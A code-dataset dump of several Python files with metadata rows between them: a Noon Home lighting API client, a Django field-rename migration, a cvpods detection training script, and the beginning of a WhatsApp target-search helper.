NoonUnknownError,
NoonProtocolError,
NoonDuplicateIdError
)
_LOGGER = logging.getLogger(__name__)
class Noon(object):
    """Base object for Noon Home.

    Wraps authentication, device discovery (spaces/lines/scenes) and the
    websocket notification stream of a Noon Home account.  All network I/O
    goes through the aiohttp session supplied by the caller.
    """
    @property
    async def spaces(self) -> typing.Dict[Guid, NoonSpace]:
        # Lazily populated: first access triggers a full device refresh.
        if self._spaces is None:
            await self._refreshDevices()
        return self._spaces
    @property
    async def lines(self) -> typing.Dict[Guid, NoonLine]:
        # Lazily populated: first access triggers a full device refresh.
        if self._lines is None:
            await self._refreshDevices()
        return self._lines
    @property
    def session(self) -> ClientSession:
        # The aiohttp session handed in via __init__ (owned by the caller).
        return self._session
    @property
    def event_stream_connected(self) -> bool:
        # True only while the notification websocket is open.
        return self._event_stream_connected
    @property
    def event_stream_error(self) -> str:
        # Human-readable reason the event stream stopped, or None while healthy.
        return self._event_stream_error
    def __init__(self, session, username, password):
        """Create a PyNoone object.
        :param session: aiohttp ClientSession used for all requests
        :param username: Noon username
        :param password: Noon password
        :returns PyNoon base object
        """
        # Properties (None means "not discovered yet", see lazy properties above)
        self._spaces = None
        self._lines = None
        self._scenes = None
        self._all_entities = {}
        self._endpoints = {}
        self._event_stream_connected = False
        self._event_stream_error = None
        # Store credentials
        self._username = username
        self._password = password
        self._token = None
        self._token_expires = None
        # AIOHTTP
        self._session = session
        self._websocket_task = None
    async def authenticate(self) -> bool:
        """Authenticate with Noon and store the authentication token."""
        """Reuse token if we have one."""
        if self._token is not None and self._token_expires > datetime.datetime.now():
            _LOGGER.debug("Using cached token, which should still be valid")
            return True
        """ Authenticate user, and get tokens """
        _LOGGER.debug("No valid token or token expired. Authenticating...")
        payload = {
            "email": self._username,
            "password": self._password
        }
        async with self.session.post(LOGIN_URL, json=payload) as login_response:
            parsed_response = await login_response.json()
            _LOGGER.debug("Response: {}".format(parsed_response))
            # Invalid response from noon
            if not isinstance(parsed_response, dict):
                _LOGGER.error("Response from authentication was not a dictionary")
                raise NoonProtocolError
            # Single error from noon (bad credentials)
            if "error" in parsed_response.keys():
                raise NoonAuthenticationError
            # Errors from Noon
            if parsed_response.get("errors") is not None:
                _LOGGER.error("Multiple authentication errors from Noon - {}".format(parsed_response["errors"]))
                raise NoonUnknownError
            # Must have a token and lifetime; expiry is padded by 30s so we
            # re-authenticate slightly before the server-side expiry.
            try:
                self._token = parsed_response["token"]
                self._token_expires = datetime.datetime.now() + datetime.timedelta(seconds = (parsed_response["lifetime"]-30))
                _LOGGER.debug("Got token from Noon. Expires at {}".format(self._token_expires))
            except KeyError:
                _LOGGER.error("Failed to get token or lifetime from {}".format(parsed_response))
                raise NoonUnknownError
        # Get endpoints if needed
        await self._refreshEndpoints()
        # Success
        return True
    async def open_eventstream(self, event_loop=None):
        """Create a background task for the event stream."""
        if event_loop is None:
            _LOGGER.debug("Using main asyncio event loop")
            event_loop = asyncio.get_running_loop()
        assert self._websocket_task is None or self._websocket_task.cancelled(), "Already running an event stream task"
        self._websocket_task = event_loop.create_task(self._internal_eventstream())
    async def close_eventstream(self):
        """Close the event stream background task."""
        if self._websocket_task is not None and not self._websocket_task.cancelled():
            _LOGGER.debug("Canceling websocket task")
            self._websocket_task.cancel()
    async def _internal_eventstream(self):
        """Loop for connecting to the Noon notification stream.

        Runs until cancelled or a fatal error occurs; each received TEXT
        frame is parsed and its "changes" are dispatched to _handle_change.
        """
        keep_looping = True
        while keep_looping:
            try:
                await self.authenticate()
                timeout = ClientTimeout(total=8, connect=20, sock_connect=20, sock_read=8)
                event_stream_url = "{}/api/notifications".format(self._endpoints["notification-ws"])
                _LOGGER.debug("Connecting to notification stream...")
                async with self.session.ws_connect(event_stream_url, timeout=timeout, heartbeat=60, headers={"Authorization": "Token {}".format(self._token)}) as ws:
                    _LOGGER.debug("Connected to notification stream")
                    self._event_stream_connected = True
                    self._event_stream_error = None
                    async for msg in ws:
                        if msg.type == WSMsgType.TEXT:
                            _LOGGER.debug("Got websocket message: {}".format(msg.data))
                            parsed_data = json.loads(msg.data)
                            changes = parsed_data["data"].get("changes", [])
                            for change in changes:
                                await self._handle_change(change)
                        elif msg.type == WSMsgType.CLOSED:
                            _LOGGER.error("Socket closed")
                            raise NoonProtocolError("Notification stream closed unexpectedly")
                        elif msg.type == WSMsgType.ERROR:
                            _LOGGER.error("Websocket error")
                            raise NoonProtocolError("Unknown error on notification stream")
            except CancelledError:
                _LOGGER.debug("Loop canceled.")
                self._event_stream_error = "Canceled"
                keep_looping = False
            except WSServerHandshakeError:
                _LOGGER.error("Loop Fatal: Handshake error")
                self._event_stream_error = "Handshake Error"
                keep_looping = False
            except Exception:
                # NOTE(review): any other exception (including NoonProtocolError
                # raised above) ends the loop permanently — there is no retry.
                _LOGGER.exception("Loop Fatal: Generic exception during event loop")
                self._event_stream_error = "Unknown exception - {}".format(traceback.format_exc())
                keep_looping = False
            finally:
                _LOGGER.debug("Event stream is disconnected.")
                self._event_stream_connected = False
    async def _handle_change(self, change):
        """Process a change notification."""
        guid = change.get("guid", None)
        if guid is None:
            _LOGGER.error("Cannot process change - no GUID in {}".format(change))
            return
        affected_entity = self._all_entities.get(guid, None)
        if affected_entity is None:
            # Change for a GUID we never registered; ignore it.
            _LOGGER.debug("UNEXPECTED: Got change notification for {}, but not an expected entity! ({}".format(guid, change))
            return
        _LOGGER.debug("Got change notification for '{}' - {}".format(affected_entity.name, change))
        changed_fields = change.get("fields", [])
        return await affected_entity.handle_update(changed_fields)
    def get_entity(self, entity_id: Guid) -> NoonEntity:
        # Lookup across all registered entities; returns None when unknown.
        return self._all_entities.get(entity_id, None)
    async def _refreshEndpoints(self):
        """Update the noon endpoints for this account"""
        # Endpoints are fetched once and cached for the object's lifetime.
        if len(self._endpoints) > 0:
            return
        await self.authenticate()
        async with self.session.get(DEX_URL, headers={
            "Authorization": "Token {}".format(self._token)
        }) as login_response:
            parsed_response = await login_response.json()
            # Must be a dictionary
            if not isinstance(parsed_response, dict):
                _LOGGER.error("Response from get endpoints was not a dictionary - {}".format(parsed_response))
                raise NoonProtocolError
            # Store
            try:
                self._endpoints = parsed_response["endpoints"]
            except KeyError:
                _LOGGER.error("Unexpected endpoints response {}".format(parsed_response))
                raise NoonUnknownError
    def _registerEntity(self, entity: NoonEntity):
        """ EVERYTHING """
        # Always index by GUID; the per-type maps below are additional views.
        self._all_entities[entity.guid] = entity
        """ SPACE """
        # NOTE(review): the "and False" below makes the duplicate-ID error
        # branch unreachable — duplicates are silently ignored. Looks
        # intentional (disabled check) but worth confirming.
        if isinstance(entity, NoonSpace):
            existingEntity = self._spaces.get(entity.guid, None)
            if existingEntity is not None:
                if entity.name != existingEntity.name and False:
                    _LOGGER.error("New space '{}' has same ID as existing space '{}'".format(entity.name, existingEntity.name))
                    raise NoonDuplicateIdError
                else:
                    return
            else:
                self._spaces[entity.guid] = entity
        """ LINE """
        if isinstance(entity, NoonLine):
            existingEntity = self._lines.get(entity.guid, None)
            if existingEntity is not None:
                if entity.name != existingEntity.name and False:
                    _LOGGER.error("New line '{}' has same ID as existing line '{}'".format(entity.name, existingEntity.name))
                    raise NoonDuplicateIdError
                else:
                    return
            else:
                self._lines[entity.guid] = entity
        """ SCENE """
        if isinstance(entity, NoonScene):
            existingEntity = self._scenes.get(entity.guid, None)
            if existingEntity is not None:
                if entity.name != existingEntity.name and False:
                    _LOGGER.error("New scene '{}' has same ID as existing scene '{}'".format(entity.name, existingEntity.name))
                    raise NoonDuplicateIdError
                else:
                    return
            else:
                self._scenes[entity.guid] = entity
    async def _refreshDevices(self):
        """Load the devices (spaces/lines) on this account."""
        # Reset cache
        self._spaces = {}
        self._scenes = {}
        self._lines = {}
        # Authenticate if needed
        await self.authenticate()
        # Load the device details via a GraphQL query against the "query" endpoint.
        url = "{}/api/query".format(self._endpoints["query"])
        headers = {
            "Authorization": "Token {}".format(self._token),
            "Content-Type": "application/graphql"
        }
        data = "{spaces {guid name lightsOn activeScene{guid name} lines{guid lineState displayName dimmingLevel multiwayMaster { guid }} scenes{name guid}}}"
        async with self.session.post(url, headers=headers, data=data) as discovery_response:
            parsed_response = await discovery_response.json()
            # Must be a dictionary
            if not isinstance(parsed_response, dict):
                _LOGGER.error("Response from discovery was not a dictionary - {}".format(parsed_response))
                raise NoonProtocolError
            # Parse spaces; NoonSpace.from_json is expected to register the
            # space and its children via _registerEntity — TODO confirm.
            for space in parsed_response["spaces"]:
                this_space = await NoonSpace.from_json(self, space)
                _LOGGER.debug("Discovered space {}".format(this_space.name))
| 38.980392
| 165
| 0.597082
|
import logging
import asyncio
from asyncio import CancelledError
from aiohttp import ClientSession, WSMsgType, ClientTimeout, WSServerHandshakeError
import json
import datetime
import traceback
import typing
from .const import (
LOGIN_URL,
DEX_URL,
Guid
)
from .space import NoonSpace
from .line import NoonLine
from .entity import NoonEntity
from .scene import NoonScene
from .exceptions import (
NoonAuthenticationError,
NoonUnknownError,
NoonProtocolError,
NoonDuplicateIdError
)
_LOGGER = logging.getLogger(__name__)
class Noon(object):
@property
async def spaces(self) -> typing.Dict[Guid, NoonSpace]:
if self._spaces is None:
await self._refreshDevices()
return self._spaces
@property
async def lines(self) -> typing.Dict[Guid, NoonLine]:
if self._lines is None:
await self._refreshDevices()
return self._lines
@property
def session(self) -> ClientSession:
return self._session
@property
def event_stream_connected(self) -> bool:
return self._event_stream_connected
@property
def event_stream_error(self) -> str:
return self._event_stream_error
def __init__(self, session, username, password):
self._spaces = None
self._lines = None
self._scenes = None
self._all_entities = {}
self._endpoints = {}
self._event_stream_connected = False
self._event_stream_error = None
self._username = username
self._password = password
self._token = None
self._token_expires = None
self._session = session
self._websocket_task = None
async def authenticate(self) -> bool:
if self._token is not None and self._token_expires > datetime.datetime.now():
_LOGGER.debug("Using cached token, which should still be valid")
return True
_LOGGER.debug("No valid token or token expired. Authenticating...")
payload = {
"email": self._username,
"password": self._password
}
async with self.session.post(LOGIN_URL, json=payload) as login_response:
parsed_response = await login_response.json()
_LOGGER.debug("Response: {}".format(parsed_response))
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from authentication was not a dictionary")
raise NoonProtocolError
if "error" in parsed_response.keys():
raise NoonAuthenticationError
if parsed_response.get("errors") is not None:
_LOGGER.error("Multiple authentication errors from Noon - {}".format(parsed_response["errors"]))
raise NoonUnknownError
try:
self._token = parsed_response["token"]
self._token_expires = datetime.datetime.now() + datetime.timedelta(seconds = (parsed_response["lifetime"]-30))
_LOGGER.debug("Got token from Noon. Expires at {}".format(self._token_expires))
except KeyError:
_LOGGER.error("Failed to get token or lifetime from {}".format(parsed_response))
raise NoonUnknownError
await self._refreshEndpoints()
return True
async def open_eventstream(self, event_loop=None):
if event_loop is None:
_LOGGER.debug("Using main asyncio event loop")
event_loop = asyncio.get_running_loop()
assert self._websocket_task is None or self._websocket_task.cancelled(), "Already running an event stream task"
self._websocket_task = event_loop.create_task(self._internal_eventstream())
async def close_eventstream(self):
if self._websocket_task is not None and not self._websocket_task.cancelled():
_LOGGER.debug("Canceling websocket task")
self._websocket_task.cancel()
async def _internal_eventstream(self):
keep_looping = True
while keep_looping:
try:
await self.authenticate()
timeout = ClientTimeout(total=8, connect=20, sock_connect=20, sock_read=8)
event_stream_url = "{}/api/notifications".format(self._endpoints["notification-ws"])
_LOGGER.debug("Connecting to notification stream...")
async with self.session.ws_connect(event_stream_url, timeout=timeout, heartbeat=60, headers={"Authorization": "Token {}".format(self._token)}) as ws:
_LOGGER.debug("Connected to notification stream")
self._event_stream_connected = True
self._event_stream_error = None
async for msg in ws:
if msg.type == WSMsgType.TEXT:
_LOGGER.debug("Got websocket message: {}".format(msg.data))
parsed_data = json.loads(msg.data)
changes = parsed_data["data"].get("changes", [])
for change in changes:
await self._handle_change(change)
elif msg.type == WSMsgType.CLOSED:
_LOGGER.error("Socket closed")
raise NoonProtocolError("Notification stream closed unexpectedly")
elif msg.type == WSMsgType.ERROR:
_LOGGER.error("Websocket error")
raise NoonProtocolError("Unknown error on notification stream")
except CancelledError:
_LOGGER.debug("Loop canceled.")
self._event_stream_error = "Canceled"
keep_looping = False
except WSServerHandshakeError:
_LOGGER.error("Loop Fatal: Handshake error")
self._event_stream_error = "Handshake Error"
keep_looping = False
except Exception:
_LOGGER.exception("Loop Fatal: Generic exception during event loop")
self._event_stream_error = "Unknown exception - {}".format(traceback.format_exc())
keep_looping = False
finally:
_LOGGER.debug("Event stream is disconnected.")
self._event_stream_connected = False
async def _handle_change(self, change):
guid = change.get("guid", None)
if guid is None:
_LOGGER.error("Cannot process change - no GUID in {}".format(change))
return
affected_entity = self._all_entities.get(guid, None)
if affected_entity is None:
_LOGGER.debug("UNEXPECTED: Got change notification for {}, but not an expected entity! ({}".format(guid, change))
return
_LOGGER.debug("Got change notification for '{}' - {}".format(affected_entity.name, change))
changed_fields = change.get("fields", [])
return await affected_entity.handle_update(changed_fields)
def get_entity(self, entity_id: Guid) -> NoonEntity:
return self._all_entities.get(entity_id, None)
async def _refreshEndpoints(self):
if len(self._endpoints) > 0:
return
await self.authenticate()
async with self.session.get(DEX_URL, headers={
"Authorization": "Token {}".format(self._token)
}) as login_response:
parsed_response = await login_response.json()
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from get endpoints was not a dictionary - {}".format(parsed_response))
raise NoonProtocolError
try:
self._endpoints = parsed_response["endpoints"]
except KeyError:
_LOGGER.error("Unexpected endpoints response {}".format(parsed_response))
raise NoonUnknownError
def _registerEntity(self, entity: NoonEntity):
self._all_entities[entity.guid] = entity
if isinstance(entity, NoonSpace):
existingEntity = self._spaces.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New space '{}' has same ID as existing space '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._spaces[entity.guid] = entity
if isinstance(entity, NoonLine):
existingEntity = self._lines.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New line '{}' has same ID as existing line '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._lines[entity.guid] = entity
if isinstance(entity, NoonScene):
existingEntity = self._scenes.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New scene '{}' has same ID as existing scene '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._scenes[entity.guid] = entity
async def _refreshDevices(self):
self._spaces = {}
self._scenes = {}
self._lines = {}
await self.authenticate()
url = "{}/api/query".format(self._endpoints["query"])
headers = {
"Authorization": "Token {}".format(self._token),
"Content-Type": "application/graphql"
}
data = "{spaces {guid name lightsOn activeScene{guid name} lines{guid lineState displayName dimmingLevel multiwayMaster { guid }} scenes{name guid}}}"
async with self.session.post(url, headers=headers, data=data) as discovery_response:
parsed_response = await discovery_response.json()
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from discovery was not a dictionary - {}".format(parsed_response))
raise NoonProtocolError
for space in parsed_response["spaces"]:
this_space = await NoonSpace.from_json(self, space)
_LOGGER.debug("Discovered space {}".format(this_space.name))
| true
| true
|
f7052c1b310c4f6ff723bac7bb1d25d4a354f20d
| 6,206
|
py
|
Python
|
tools/train_net.py
|
lxtGH/cvpods-1
|
fb61b6a63dfa65b21a782a4fc7e15a88ce018c51
|
[
"Apache-2.0"
] | 1
|
2021-04-24T17:01:29.000Z
|
2021-04-24T17:01:29.000Z
|
tools/train_net.py
|
wondervictor/cvpods
|
614a975e5425bbaeb66bbd1ffca552d633ba89ca
|
[
"Apache-2.0"
] | null | null | null |
tools/train_net.py
|
wondervictor/cvpods
|
614a975e5425bbaeb66bbd1ffca552d633ba89ca
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# Modified by BaseDetection, Inc. and its affiliates. All Rights Reserved
"""
Detection Training Script.
This scripts reads a given config file and runs the training or evaluation.
It is an entry point that is made to train standard models in cvpods.
In order to let one script support training of many models,
this script contains logic that are specific to these built-in models and therefore
may not be suitable for your own project.
For example, your research project perhaps only needs a single "evaluator".
Therefore, we recommend you to use cvpods as an library and take
this file as an example of how to use the library.
You may want to write your own script with your datasets and other customizations.
"""
import logging
import os
import pickle as pkl
import sys
from collections import OrderedDict
from colorama import Fore, Style
import torch
from cvpods.checkpoint import DetectionCheckpointer
from cvpods.engine import DefaultTrainer, default_argument_parser, default_setup, hooks, launch
from cvpods.evaluation import build_evaluator, verify_results
from cvpods.modeling import GeneralizedRCNNWithTTA
from cvpods.utils import comm
sys.path.insert(0, '.')
from config import config # noqa: E402
from net import build_model # noqa: E402
class Trainer(DefaultTrainer):
    """
    We use the "DefaultTrainer" which contains pre-defined default logic for
    standard training workflow. They may not work for you, especially if you
    are working on a new research project. In that case you can use the cleaner
    "SimpleTrainer", or write your own training loop. You can use
    "tools/plain_train_net.py" as an example.
    """
    @classmethod
    def build_evaluator(cls, cfg, dataset_name, dataset, output_folder=None):
        """
        Create evaluator(s) for a given dataset.
        This uses the special metadata "evaluator_type" associated with each builtin dataset.
        For your own dataset, you can simply create an evaluator manually in your
        script and do not have to worry about the hacky if-else logic here.
        """
        # Whether to dump training-set predictions is controlled globally.
        dump_train = config.GLOBAL.DUMP_TRAIN
        return build_evaluator(cfg, dataset_name, dataset, output_folder, dump=dump_train)
    @classmethod
    def test_with_TTA(cls, cfg, model):
        """Evaluate `model` with test-time augmentation; returns metrics keyed with a "_TTA" suffix."""
        logger = logging.getLogger("cvpods.trainer")
        # In the end of training, run an evaluation with TTA
        # Only support some R-CNN models.
        logger.info("Running inference with test-time augmentation ...")
        model = GeneralizedRCNNWithTTA(cfg, model)
        res = cls.test(cfg, model, output_folder=os.path.join(cfg.OUTPUT_DIR, "inference_TTA"))
        # Re-key results so TTA metrics don't collide with plain ones.
        res = OrderedDict({k + "_TTA": v for k, v in res.items()})
        return res
def stage_main(args, cfg, build):
    """Run one training (or evaluation) stage with config `cfg` and model builder `build`."""
    cfg.merge_from_list(args.opts)
    cfg, logger = default_setup(cfg, args)
    model_build_func = build
    """
    If you'd like to do anything fancier than the standard training logic,
    consider writing your own training loop or subclassing the trainer.
    """
    trainer = Trainer(cfg, model_build_func)
    trainer.resume_or_load(resume=args.resume)
    if args.eval_only:
        # Evaluation-only path: load weights, test, and return the metrics.
        DetectionCheckpointer(
            trainer.model, save_dir=cfg.OUTPUT_DIR, resume=args.resume).resume_or_load(
                cfg.MODEL.WEIGHTS, resume=args.resume)
        res = Trainer.test(cfg, trainer.model)
        if comm.is_main_process():
            verify_results(cfg, res)
        if cfg.TEST.AUG.ENABLED:
            res.update(Trainer.test_with_TTA(cfg, trainer.model))
        return res
    # Check whether the workspace has enough storage space for checkpoints;
    # assume that a single dumped model is 700Mb.
    file_sys = os.statvfs(cfg.OUTPUT_DIR)
    free_space_Gb = (file_sys.f_bfree * file_sys.f_frsize) / 2**30
    eval_space_Gb = (cfg.SOLVER.LR_SCHEDULER.MAX_ITER // cfg.SOLVER.CHECKPOINT_PERIOD) * 700 / 2**10
    if eval_space_Gb > free_space_Gb:
        # Warn only — training still proceeds on a nearly-full disk.
        logger.warning(f"{Fore.RED}Remaining space({free_space_Gb}GB) "
                       f"is less than ({eval_space_Gb}GB){Style.RESET_ALL}")
    if cfg.TEST.AUG.ENABLED:
        trainer.register_hooks(
            [hooks.EvalHook(0, lambda: trainer.test_with_TTA(cfg, trainer.model))]
        )
    trainer.train()
    if comm.is_main_process() and cfg.MODEL.AS_PRETRAIN:
        # convert last ckpt to pretrain format
        convert_to_pretrained_model(
            input=os.path.join(cfg.OUTPUT_DIR, "model_final.pth"),
            save_path=os.path.join(cfg.OUTPUT_DIR, "model_final_pretrain_weight.pkl")
        )
def convert_to_pretrained_model(input, save_path):
    """Convert a cvpods checkpoint into a pretrain-format pickle.

    Keeps only the weights under the ``encoder_q.`` (MoCo) or ``network``
    branch, strips those prefixes from the keys, and dumps the tensors as
    numpy arrays for cvpods' matching heuristics to consume.

    Args:
        input: Path to the ``.pth`` checkpoint; must contain a "model" dict.
        save_path: Destination path for the converted ``.pkl`` file.
    """
    obj = torch.load(input, map_location="cpu")
    obj = obj["model"]
    # Decide the author tag from the *original* key names.  The previous
    # implementation tested the loop variable after the loop, where the
    # "encoder_q." prefix had already been stripped (or `k` was a skipped
    # key), so "__author__" could never be "MOCO" and an empty model dict
    # raised NameError.
    is_moco = any(key.startswith("encoder_q.") for key in obj)
    newmodel = {}
    for k, v in obj.items():
        if not k.startswith("encoder_q.") and not k.startswith("network"):
            continue  # drop keys from other branches (e.g. momentum encoder)
        old_k = k
        if k.startswith("encoder_q."):
            k = k.replace("encoder_q.", "")
        elif k.startswith("network"):
            k = k.replace("network.", "")
        print(old_k, "->", k)
        newmodel[k] = v.numpy()
    res = {
        "model": newmodel,
        "__author__": "MOCO" if is_moco else "CLS",
        "matching_heuristics": True
    }
    with open(save_path, "wb") as f:
        pkl.dump(res, f)
def main(args):
    """Run every configured stage (multi-stage training when `config` is a list)."""
    if not isinstance(config, list):
        stage_main(args, config, build_model)
        return
    # One builder per config, in lockstep.
    assert isinstance(build_model, list) and len(config) == len(build_model)
    for stage_cfg, stage_build in zip(config, build_model):
        stage_main(args, stage_cfg, stage_build)
# Script entry point: symlink the log directory for the (first) config,
# then launch possibly-distributed training.
if __name__ == "__main__":
    args = default_argument_parser().parse_args()
    if isinstance(config, list):
        assert len(config) > 0
        print("soft link first config in list to {}".format(config[0].OUTPUT_DIR))
        config[0].link_log()
    else:
        print("soft link to {}".format(config.OUTPUT_DIR))
        config.link_log()
    print("Command Line Args:", args)
    launch(
        main,
        args.num_gpus,
        num_machines=args.num_machines,
        machine_rank=args.machine_rank,
        dist_url=args.dist_url,
        args=(args,),
    )
| 36.505882
| 100
| 0.679987
|
import logging
import os
import pickle as pkl
import sys
from collections import OrderedDict
from colorama import Fore, Style
import torch
from cvpods.checkpoint import DetectionCheckpointer
from cvpods.engine import DefaultTrainer, default_argument_parser, default_setup, hooks, launch
from cvpods.evaluation import build_evaluator, verify_results
from cvpods.modeling import GeneralizedRCNNWithTTA
from cvpods.utils import comm
sys.path.insert(0, '.')
from config import config
from net import build_model
class Trainer(DefaultTrainer):
@classmethod
def build_evaluator(cls, cfg, dataset_name, dataset, output_folder=None):
dump_train = config.GLOBAL.DUMP_TRAIN
return build_evaluator(cfg, dataset_name, dataset, output_folder, dump=dump_train)
@classmethod
def test_with_TTA(cls, cfg, model):
logger = logging.getLogger("cvpods.trainer")
logger.info("Running inference with test-time augmentation ...")
model = GeneralizedRCNNWithTTA(cfg, model)
res = cls.test(cfg, model, output_folder=os.path.join(cfg.OUTPUT_DIR, "inference_TTA"))
res = OrderedDict({k + "_TTA": v for k, v in res.items()})
return res
def stage_main(args, cfg, build):
cfg.merge_from_list(args.opts)
cfg, logger = default_setup(cfg, args)
model_build_func = build
trainer = Trainer(cfg, model_build_func)
trainer.resume_or_load(resume=args.resume)
if args.eval_only:
DetectionCheckpointer(
trainer.model, save_dir=cfg.OUTPUT_DIR, resume=args.resume).resume_or_load(
cfg.MODEL.WEIGHTS, resume=args.resume)
res = Trainer.test(cfg, trainer.model)
if comm.is_main_process():
verify_results(cfg, res)
if cfg.TEST.AUG.ENABLED:
res.update(Trainer.test_with_TTA(cfg, trainer.model))
return res
file_sys = os.statvfs(cfg.OUTPUT_DIR)
free_space_Gb = (file_sys.f_bfree * file_sys.f_frsize) / 2**30
eval_space_Gb = (cfg.SOLVER.LR_SCHEDULER.MAX_ITER // cfg.SOLVER.CHECKPOINT_PERIOD) * 700 / 2**10
if eval_space_Gb > free_space_Gb:
logger.warning(f"{Fore.RED}Remaining space({free_space_Gb}GB) "
f"is less than ({eval_space_Gb}GB){Style.RESET_ALL}")
if cfg.TEST.AUG.ENABLED:
trainer.register_hooks(
[hooks.EvalHook(0, lambda: trainer.test_with_TTA(cfg, trainer.model))]
)
trainer.train()
if comm.is_main_process() and cfg.MODEL.AS_PRETRAIN:
convert_to_pretrained_model(
input=os.path.join(cfg.OUTPUT_DIR, "model_final.pth"),
save_path=os.path.join(cfg.OUTPUT_DIR, "model_final_pretrain_weight.pkl")
)
def convert_to_pretrained_model(input, save_path):
obj = torch.load(input, map_location="cpu")
obj = obj["model"]
newmodel = {}
for k, v in obj.items():
if not k.startswith("encoder_q.") and not k.startswith("network"):
continue
old_k = k
if k.startswith("encoder_q."):
k = k.replace("encoder_q.", "")
elif k.startswith("network"):
k = k.replace("network.", "")
print(old_k, "->", k)
newmodel[k] = v.numpy()
res = {
"model": newmodel,
"__author__": "MOCO" if k.startswith("encoder_q.") else "CLS",
"matching_heuristics": True
}
with open(save_path, "wb") as f:
pkl.dump(res, f)
def main(args):
if isinstance(config, list):
assert isinstance(build_model, list) and len(config) == len(build_model)
for cfg, build in zip(config, build_model):
stage_main(args, cfg, build)
else:
stage_main(args, config, build_model)
if __name__ == "__main__":
args = default_argument_parser().parse_args()
if isinstance(config, list):
assert len(config) > 0
print("soft link first config in list to {}".format(config[0].OUTPUT_DIR))
config[0].link_log()
else:
print("soft link to {}".format(config.OUTPUT_DIR))
config.link_log()
print("Command Line Args:", args)
launch(
main,
args.num_gpus,
num_machines=args.num_machines,
machine_rank=args.machine_rank,
dist_url=args.dist_url,
args=(args,),
)
| true
| true
|
f7052ff86a7ae193a4261efa32bdb7d04b30b4c6
| 362
|
py
|
Python
|
core/migrations/0073_rename_name_lt_product_name.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 2
|
2020-12-17T13:50:42.000Z
|
2021-01-09T07:01:07.000Z
|
core/migrations/0073_rename_name_lt_product_name.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 2
|
2021-08-25T05:02:56.000Z
|
2022-01-16T18:29:49.000Z
|
core/migrations/0073_rename_name_lt_product_name.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 1
|
2020-11-16T01:40:15.000Z
|
2020-11-16T01:40:15.000Z
|
# Generated by Django 3.2.3 on 2021-05-17 16:22
from django.db import migrations
class Migration(migrations.Migration):
    # Renames Product.name_lt to Product.name.  Depends on the previous
    # migration that altered Product.region.
    dependencies = [
        ('core', '0072_alter_product_region'),
    ]
    operations = [
        migrations.RenameField(
            model_name='product',
            old_name='name_lt',
            new_name='name',
        ),
    ]
| 19.052632
| 47
| 0.582873
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0072_alter_product_region'),
]
operations = [
migrations.RenameField(
model_name='product',
old_name='name_lt',
new_name='name',
),
]
| true
| true
|
f705308018a1ffa77d87e188b5c43d4d6f2d194a
| 18,888
|
py
|
Python
|
wplay/utils/target_search.py
|
payal-98/whatsapp-play
|
3d667ee26c2ef6c29a12a5338e22ec9f8458a55c
|
[
"MIT"
] | 1
|
2020-03-25T12:25:40.000Z
|
2020-03-25T12:25:40.000Z
|
wplay/utils/target_search.py
|
payal-98/whatsapp-play
|
3d667ee26c2ef6c29a12a5338e22ec9f8458a55c
|
[
"MIT"
] | null | null | null |
wplay/utils/target_search.py
|
payal-98/whatsapp-play
|
3d667ee26c2ef6c29a12a5338e22ec9f8458a55c
|
[
"MIT"
] | null | null | null |
__author__ = 'Alexandre Calil Martins Fonseca, github: xandao6'
# region TUTORIAL
'''
Go to region 'FOR SCRIPTING' and use the methods in your script!
EXAMPLE OF USAGE:
from wplay.pyppeteerUtils import pyppeteerConfig as pypConfig
from wplay.pyppeteerUtils import pyppeteerSearch as pypSearch
async def my_script(target):
    pages, browser = await pyp.configure_browser_and_load_whatsapp(pypConfig.websites['whatsapp'])
await pypSearch.search_for_target_and_get_ready_for_conversation(pages[0], target)
message = pypSearch.ask_user_for_message_breakline_mode()
await pypSearch.send_message(pages[0], message)
message2 = pypSearch.ask_user_for_message()
await pypSearch.send_message(pages[0], message2)
'''
# endregion
# region IMPORTS
from wplay.utils.helpers import whatsapp_selectors_dict
from wplay.utils import Logger
from wplay.utils.helpers import logs_path
from pyppeteer.errors import ElementHandleError
# endregion
# region FOR SCRIPTING
async def search_and_select_target(page, target, hide_groups=False):
    """Search WhatsApp Web for `target` via the "new chat" flow and open the chat.

    Filters contacts and (unless `hide_groups`) groups matching `target`,
    asks the user to pick one, navigates to it, and returns the title of
    the chat that ended up focused.
    """
    await __open_new_chat(page)
    await __type_in_new_chat_search_bar(page, target)
    # Collect candidate contacts and groups matching the query.
    contact_list_elements_unchecked = await __get_contacts_elements_filtered(page, target)
    group_list_elements_unchecked = await __get_groups_elements_filtered(page, target, hide_groups)
    contact_titles_unchecked = await __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked)
    group_titles_unchecked = await __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked)
    # Pair titles with their DOM elements, then validate against the query.
    contact_list_unchecked = __zip_contact_titles_and_elements_unchecked(
        contact_titles_unchecked, contact_list_elements_unchecked)
    group_list_unchecked = __zip_group_titles_and_elements_unchecked(
        group_titles_unchecked, group_list_elements_unchecked)
    contact_tuple = __check_contact_list(target, contact_list_unchecked)
    group_tuple = __check_group_list(target, group_list_unchecked)
    target_tuple = __get_target_tuple(contact_tuple, group_tuple)
    __print_target_tuple(target_tuple)
    # Interactive choice among the filtered candidates.
    target_index_choosed = __ask_user_to_choose_the_filtered_target(target_tuple)
    choosed_target = __get_choosed_target(target_tuple, target_index_choosed)
    await __navigate_to_target(page, choosed_target)
    target_focused_title = await __get_focused_target_title(page, target)
